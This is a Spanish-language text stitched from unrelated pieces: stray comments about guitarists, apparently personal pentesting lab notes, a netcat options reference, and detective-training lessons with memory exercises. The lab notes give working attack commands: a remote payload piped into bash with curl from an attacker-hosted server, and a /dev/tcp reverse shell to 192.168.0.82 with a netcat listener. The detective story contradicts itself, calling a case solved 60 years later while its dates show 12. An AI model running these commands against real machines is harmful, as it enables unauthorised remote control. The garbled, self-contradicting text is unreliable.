Por eso nosotros decimos "ave Miller"
No odiaba a los negros, solo decía que eran negros porque no se bañaban
Es tremendo, no lo había escuchado. Son dos virtuosos pero becker es dueño de una parte de mi corazón. Sabes si tenía la guitarra escalopada?
The song air is amazing, I remember to barroco. Y todo el disco te parte la cabeza
Servicio web de Python para Comunicarse en la Red
----------------------------------------------------------------------

Una vez hayamos obtenido ejecución remota de comandos en un servidor, suele ser necesario poder transferir archivos al objetivo o incluso ayudarnos de un servidor web para obtener la reverse shell, por lo que ahora vamos a ver, de forma breve, cómo levantar un servidor HTTP con python para lograr esto mismo.
en mi maquina atacate, voy a crear un payload que se llame “payload.sh”

Con nano creamos un fichero que se llame "payload.sh" e ingresamos el tipico script de revershell
Una vez guardado quiero que compartirlo con la maquina victima para que lo ejecute y para esto se puede usar
pyhton3 -m http.server 80

esto va a levantar un servidor por el puerto 80 con todos los archivos que se encuentren en el actual directorio
Si vamos a la maquina victima, abrimos el navegador y ponemos la ip de la maquina atacante que en este caso es 192.168.0.82, se accede al archivo que esta compartiendo desde la maquina atacante
Ahora corre un servidor web corriendo por el p 80 compartiendo archivos

Si vamos a la maquina victima, abrimos el navegador y ponemos la ip de la maquina atacante que en este caso es 192.168.0.82, se accede al archivo que esta compartiendo desde la maquina atacante
De tal forma que si le damos click al link

Una vez guardado se puede ejecutar.
Si tuvieramos ejecucion remota, dentro de la terminal, podriamos accionar de la siguiente forma:
curl http://192.168.0.82/payload.sh | bash

Escuchando desde la maquina atacante con nc -vlnp 443
Hacemos una peticion al servidor web donde se esta compratiendo el archivo y luego una vez obtenido el archivo, se va interpretar con bash

USO DE NETCAT
-------------------------

Voy a utilizar netcat para hacer una revers shell a una maquina lubuntu que se encuentra en mi red, dentro de VBox
Comenzare con buscar la siguiente pag https://www.revshells.com/
Tenemos la opcion de ingresar nuestra ip y el puerto por el cual vamos a conectarnos; en este caso seleccione la ip de mi maquina atacante kali linux corriendo por el puerto 443

como se ve en la imagen, fije los parametro y me devolvio una linea de codigo
[ sh -i >& /dev/tcp/192.168.0.82/443 0>&1 ]
Ahora voy a ponerme en escucha con el comando que me indica la misma pag o sea:
[ sudo nc -lvnp 443 ]
Digamos que obtuve acceso a la maquina, explotando una vulnerabilidad o simplemente vi luz y entre. De cualquier forma, ahora estando dentro puedo ejecutar el script y se conecta, como se ve

como se podra ver, ya tengo acceso

¿Qué es Netcat y cómo funciona?
--------------------------------------------

Netcat es una herramienta de línea de comandos que sirve para escribir y leer datos en la red. Para la transmisión de datos, Netcat usa los protocolos de red TCP/IP y UDP. La herramienta proviene originalmente del mundo de Unix; desde entonces, se ha expandido a todas las plataformas.
Gracias a su universalidad, a Netcat se la llama “la navaja suiza del TCP/IP”. Puede utilizarse, por ejemplo, para diagnosticar errores y problemas que afecten a la funcionalidad y la seguridad de una red. Netcat también puede escanear puertos, hacer streaming de datos o simplemente transferirlos. Además, permite configurar servidores de chat y de web e iniciar consultas por correo. Este software minimalista, desarrollado a mediados de los 90, puede operar en modo servidor y cliente.
Sintaxis de Netcat: ¿qué comandos y opciones están disponibles?
La sintaxis de Netcat consiste en dos componentes fundamentales: el comando básico “nc”, siempre idéntico, seguido por varias “opciones”. El comando básico direcciona al archivo de programa nc.exe, mientras que las opciones determinan el rango concreto de funciones de la versión de Netcat, por lo que varían dependiendo del sistema operativo y de la versión de Netcat utilizada.
La siguiente tabla se limita a recoger las opciones más importantes disponibles en la mayoría de las versiones para Linux, macOS y Windows. También se enumeran otras opciones útiles, en particular las extensiones de la versión GNU Netcat, ampliamente utilizada en Linux, Unix y macOS:
Opciones Descripción
-4 Fuerza el uso de IPv4 (GNU Netcat)
-6 Fuerza el uso de IPv6 (GNU Netcat)
-d Elimina Netcat de la consola (operación en segundo plano; disponible en Windows y en las versiones actuales de GNU Netcat)
-D Habilita la opción de depurar los sockets (GNU Netcat)
-h (display help) Muestra la ayuda (comandos/opciones con una breve descripción)
-i (secs) Retardo en segundos para las líneas enviadas o los puertos escaneados
-k Netcat espera una nueva conexión después de que termine la anterior (solo en GNU Netcat y en combinación con “-l”)
-l (listen mode) Modo de escucha/listen y servidor para las solicitudes de conexión entrantes (sobre el puerto especificado)
-L (listen harder) Hace que Netcat funcione en modo de escucha incluso después de las desconexiones del lado del cliente (usando los mismos parámetros en todo momento; solo en la versión de Windows)
-n (numeric-only) Solo números IP, sin nombres DNS
-o (file) Se realiza un volcado hexadecimal del tráfico (el contenido de los archivos se muestra en vista hexadecimal); se utiliza para la depuración (debugging de aplicaciones de red); permite el registro de la comunicación (sniffing) para paquetes salientes y entrantes
-p (port) Especifica el puerto de origen local que Netcat debe utilizar para las conexiones salientes
-r Usa valores de puerto aleatorios al escanear (para puertos locales y remotos)
-s (adress) Especifica la dirección de la fuente local (dirección o nombre IP)
-t Modo Telnet (por ejemplo, permite el direccionamiento del servidor a través de Telnet); requiere una compilación especial de Netcat; de lo contrario, la opción no está disponible
-u Uso del modo UDP (en lugar de TCP)
-U (gateway) Netcat utiliza sockets de dominio Unix (GNU Netcat)
-v Salida detallada (por ejemplo, para la visualización y el alcance de los mensajes de error mostrados)
-w (secs) Define los tiempos muertos: para establecer y cerrar una conexión (unidad: segundos)
-z Modo de escáner de puerto (modo de I/O 0); solo escaneo para servicios de escucha (no envío de datos)
Si, por ejemplo, quieres definir un servidor o un cliente para la transferencia de datos en la red, debes observar la siguiente sintaxis:
Modo cliente (connect to somewhere):
nc [opciones] [dirección IP/nombre del host] [puerto]
Modo de servidor (listen for inbound):
nc -l -p port [opciones] [nombre del host] [puerto]
El esquema básico para ejecutar un escaneo de puertos tiene el siguiente aspecto:
nc [opciones] [host] [puerto]
Copiar archivos con Netcat
-------------------------------------
Una característica muy popular de Netcat es la copia de archivos, que puede usarse para transferir grandes cantidades de datos, así como para clonar particiones individuales o discos duros enteros. En nuestro ejemplo, el archivo test.txt debe copiarse del ordenador A (cliente) al ordenador B (servidor) a través del puerto 6790. Es necesario seguir estos pasos:
Determinar la dirección IP del ordenador B (PC de destino).
Crear el archivo de prueba test.txt en el directorio Netcat del ordenador A. En este ejemplo, el archivo de prueba se encuentra en el directorio de Netcat del cliente. En el ordenador de destino B, el archivo copiado termina también en la carpeta de Netcat (se deben cambiar las otras rutas de archivo en consecuencia).
Introducir la sintaxis de Netcat en la línea de comandos.
Ordenador B (actúa como servidor receptor):
nc -l -p 6790 > test.txt
INTRO
Ordenador A (actúa como cliente que envía):
nc [dirección IP del ordenador B] 6790 < test.txt
INTRO
El éxito de la transferencia no se confirma en el símbolo del sistema. Puedes comprobar si el archivo se ha transferido correctamente buscándolo en la carpeta de destino.
Escanear puertos
Puedes ejecutar un escaneo y encontrar puertos abiertos, por ejemplo, para detectar errores y problemas de seguridad. En el siguiente ejemplo, el ordenador tiene la dirección IP 192.168.11.1. Después de la dirección IP, se puede especificar si se desean escanear puertos individuales (por ejemplo, 1), varios puertos (1, 2, 3, etc.) o un rango completo (1-1024):
nc -w 2 -z 192.168.10.1 1-1024
La opción “-w” determina la duración de un tiempo muerto (en este ejemplo, “Intentar conectarse a los puertos durante dos segundos”). La opción “-z” indica a Netcat que busque solo servicios de escucha y que no envíe ningún dato.
La opción “-v” sirve para obtener información más detallada sobre el escaneo:
nc -v -w 2 -z 192.168.11.1 1-1024
Netcat confirma entonces un puerto abierto que ha encontrado con el mensaje “succeeded!”.
Connection to 192.168.11.1 25 port [tcp/smtp] succeeded!
En los puertos escaneados 1-1024, se ejecutan los servicios más conocidos, como correo electrónico, FTP o SSH. En este ejemplo, Netcat ha encontrado el puerto SMTP abierto de un cliente de correo electrónico.
Netcat como programa de chat simple
Netcat puede establecer una conexión TCP o UDP simple entre dos ordenadores y luego abrir un canal de comunicación. En el siguiente ejemplo, el receptor se instala primero en el sistema remoto y se pone en modo de listening (escucha). De este modo, actúa como la parte de “escucha” y utiliza el puerto 1605 para recibir mensajes, a los que se puede acceder a través de la dirección IP 192.168.11.1:
nc -l -p 1605
INTRO
A continuación, el ordenador local (PC emisor) establece una conexión con el destinatario del mensaje mediante el siguiente comando:
nc 192.168.11.1 1605
INTRO
Si la conexión se establece correctamente, los mensajes pueden intercambiarse en ambas direcciones.
Configurar un servidor web simple
Netcat también sirve para configurar un servidor web simple. Si, por ejemplo, no se puede acceder al servidor original debido a problemas técnicos, se puede al menos responder a las solicitudes con un mensaje de error predeterminado (en forma de archivo .html) con información sobre el error:
nc -l -v -p 85 -w10 -L < mensaje de error.html
Netcat espera a las solicitudes en el puerto 85 y responde a ellas con el archivo mensaje de error.html. La opción “-L” asegura que Netcat mantenga este procedimiento más allá de una sola solicitud. El parámetro “-w” termina la conexión después de 10 segundos (tiempo muerto). El parámetro “-v” proporciona al operador del servidor información sobre las solicitudes y documentos, como el sistema operativo y el tipo de navegador del ordenador cliente solicitante mediante mensajes de estado.
El éxito suele premiar al Detective Perseverante

El investigador privado nunca debe darse por vencido. La experiencia
demuestra de continuo que casos aparentemente insolubles se develan, en el momento menos pensado,
siempre que no se abandone el hilo de la pesquisa. Recuerda que NO HAY CRÍMENES PERFECTOS,
HAY INVESTIGADORES IMPERFECTOS.
Para corroborarlo, voy a narrar un episodio auténtico: un crimen que se esclareció 60 años después de
cometido y cuando el culpable se consideraba definitivamente al margen de toda condena. Lo más insólito de
este caso fue el detalle que aportó la prueba irrefutable para incriminar al homicida.

Ocurrió en Argentina, ciudad de Comodoro Rivadavia, el 17 de abril de 1965. El fotógrafo
Antonio Ostoich acababa de atender a un cliente cuando fue ultimado de varios golpes en la nuca con una
barra de hierro. Después, con la misma barra, el o los asesinos trataron de destruir la cámara fotográfica, tras
de lo cual robaron todo el dinero que hallaron en la casa.
Pasaron los años y el caso llevaba miras de convertirse en otro crimen perfecto. Hasta que un día, muy lejano
de aquel en que había ocurrido el hecho, un Detective, contemplando la semidestruida cámara fotográfica,
pensó: ̈¿Porqué tanta saña contra una simple cámara? ¿No será porque quizás contiene alguna evidencia
delatora? ̈

La examinó, hallando en su interior el negativo de la última fotografía que había tomado la infortunada
víctima. Su intuición le dijo que esa persona tenía algo que ver con el homicidio. Así que hizo revelar el
negativo, se grabó en su mente ese rostro

y no perdió la esperanza de encontrarlo algún día. Y este día llegó, 12 años más tarde. Fue en Chile, donde el
pertinaz Detective, al cruzarse con cierto individuo, tuvo la certeza de que se trataba del hombre que buscaba.
Sometido a interrogatorio, el sospechoso no tardó en confesar su participación en el crimen del fotógrafo,
junto con otros dos cómplices, aquel lejano 17 de abril de 1965. Aquí lo vemos, posando en la alcaldía de
Comodoro Rivadavia, el 5 de diciembre de 1977, es decir, más de 12 años después de la anterior
fotografía.
El criminal había quedado ̈atrapado ̈ dentro de una cámara, pero también dentro de la fina telaraña tejida
por un hábil, sutil y paciente Detective.
EJERCICIO SEGUNDO.

Al levantarnos, de mañana, anotemos en un papel el nombre de una persona y guardemos el papel.
Al día siguiente escribamos un nuevo nombre, pero recordemos antes el que hemos escrito el día anterior.
Al tercer día escribamos, de memoria, naturalmente, los dos nombres anteriormente anotados, y luego
agreguemos otro.
De esta manera, paulatinamente iremos disponiendo de una larga lista de nombres de personas que cada día,
antes de anotar un nuevo nombre, escribiremos de memoria. Es probable que, en determinadas situaciones,
tengamos que recurrir a los papeles, esto es, a la lista de nombres anotados, para recordar alguno que se nos
escapa pero el ejercicio es espléndido para incrementar el poder de nuestra memoria.
EJERCICIO PRIMERO.

Cuando estemos en nuestro lecho, antes de dormirnos, repasemos mentalmente las diferentes casas que
existen, desde la nuestra hasta la esquina.
Lógicamente, si vivimos en una esquina, concentraremos nuestra atención sobre las casas existentes en la
cuadra siguiente, hasta la próxima esquina.
Nuestra mente irá repasando, así, casa por casa, hasta llegar a la última. Al día siguiente caminaremos por la
cuadra indicada e iremos repasando las casas que en nuestra memoria hemos evocado la noche anterior.
Iremos diciendo: Esta es la casa de la familia Rodríguez; esta es la casa de los González; ésta la de los Duarte,
y así las demás. Es muy probable que en nuestra recorrida digamos de pronto: ̈Esta casa la pasé por alto, no
me acordé de ella ̈. Procederemos entonces a incluirla mentalmente en la lista de las casas que recordamos la
noche anterior.
Nuevamente, antes de dormirnos en la noche siguiente, concentraremos nuestra atención y memoria en las
casas controladas y registradas en nuestra memoria. Ahora es probable que podamos visualizar todas las
casas, sin olvidar ninguna.
Una vez logrado con éxito este ejercicio, lo repetiremos, pero esta vez recordando también las ventanas de
cada una de las casas ya retenidas en la memoria. Nuevamente registraremos algunos errores al evocar y
recordar las ventanas existentes y comprobar su exactitud al pasar ante ellas al día siguiente.
Este ejercicio, a la vez que permite desarrollar eficazmente la memoria, sirve para aumentar nuestro poder de
concentración, de manera que viene a cumplir un doble, eficaz objetivo.
EDUCACION DE LA MEMORIA

Una persona de memoria fragil no puede ser detective, ya que esa facultad mental es los mas solidos pilares de toda su labor. Ahora bien, aunque no todo el mundo posee igualmente desarrollada la memoria, hay metodos muy eficaces para educarla y robustecerla.
LA NEMOTECNIA

Es un arte milenario (ya la practicaban los antiguos griegos) para retener en la memoria, cifras, fechas,
acontecimientos, etc., asociándolos a lugares, países, nombres propios, objetos, etc. En una palabra, los
métodos nemotécnicos se basan en asociaciones de ideas, que hacen las vece de “ayudamemoria”.
Vayamos a un ejemplo practico: si en este momento solicito que me citen 4 estados del sur de EEUU, la mayoria podria nombran 2, quizas 4, i don't know. Empero si les mostrase estas 4 imagenes, es mas facil asociarlo a los 4 estados
En efecto, al ver la torre petrolera ustedes nombrarían a Texas; recordarían a Arizona y su famoso desierto al
ver el cactus; el sombrero azteca les traería a la memoria Nueva México; y el paisaje turístico a la Florida. Es
decir, la memoria de ustedes hubiera despertado al influjo de la asociación de ideas.
El método nemotécnico, como pueden comprobar, es altamente eficaz. Para recordar apellidos, por ejemplo,
aconsejamos asociarlos con objetos. Ejemplos: Chávez, con llaves; Mederos, con madera; Cárdenas, con
cadenas; Sepúlveda, con sepulcro; etc.
¿Cómo llegar a ser un buen Detective?

Cualidades principales
La persona ideal para desempeñarse como Detective es aquella que reúne las siguientes cualidades:
a) Muy buenas dotes de observador.
b) Muy buena memoria.
c) Sagacidad
d) Minuciosidad
e) Mucha paciencia.
f) Intuición.
g) Discreción.
h) Perseverancia.
El Detective no nace; se hace
Esa nómina tan extensa de dotes exigibles a los aspirantes a Detective quizás pueda acobardar, en un primer
momento, a buena cantidad de quienes sueñan con imitar al legendario Sherlock Holmes. Sin embargo, aquí
cabe aplicar aquello tan viejo y sabio de que "nadie nace sabiendo"; en otras palabras, el estudio, la voluntad
y la constancia pueden suplir muchas veces con ventaja las carencias naturales.
Hay muchísimos casos de personas que, en apariencia, no están dotadas para esa profesión, y, sin embargo,
con el tiempo llegan a convertirse en famosos Detectives. Uno de los ejemplos más notables es el de Edwuard
Henry, prominente sabueso de Scotland Yard durante el siglo pasado.
Rechazado reiteradamente por su falta de dotes congénitas para desempeñar tales funciones, Henry se
propuso lograr toda la intuición que le había negado la Naturaleza, a base de una larga, paciente y sacrificada
experiencia de años, que él mismo relató así:
̈Alquilé una habitación en un barrio londinense muy frecuentado por elementos del bajo fondo y me dediqué
a observarlos la mayor cantidad de tiempo posible, Frecuenté las casas de juego y clubes nocturnos; trabé
relación con gente de todo tipo (porteros, mozos, sirvientes, etc.) tratando de retener en mi memoria sus
principales rasgos fisonómicos.
De esa manera logré reunir datos que no hubiera podido conseguir de ningún otro modo y que, muchos años
después, me resultaría valiosísimo para mis investigaciones. Por otra parte, las amistades que ya había
cultivado fueron tan útiles para mí que hasta me salvaron la vida en una ocasión: al descubrir mi verdadera
identidad, un ganster, que estaba ebrio, anunció su decisión de eliminarme, y gracias a un mozo de mi
amistad que alcanzó a quitarle las balas a su revólver, escapé milagrosamente de la muerte ̈.
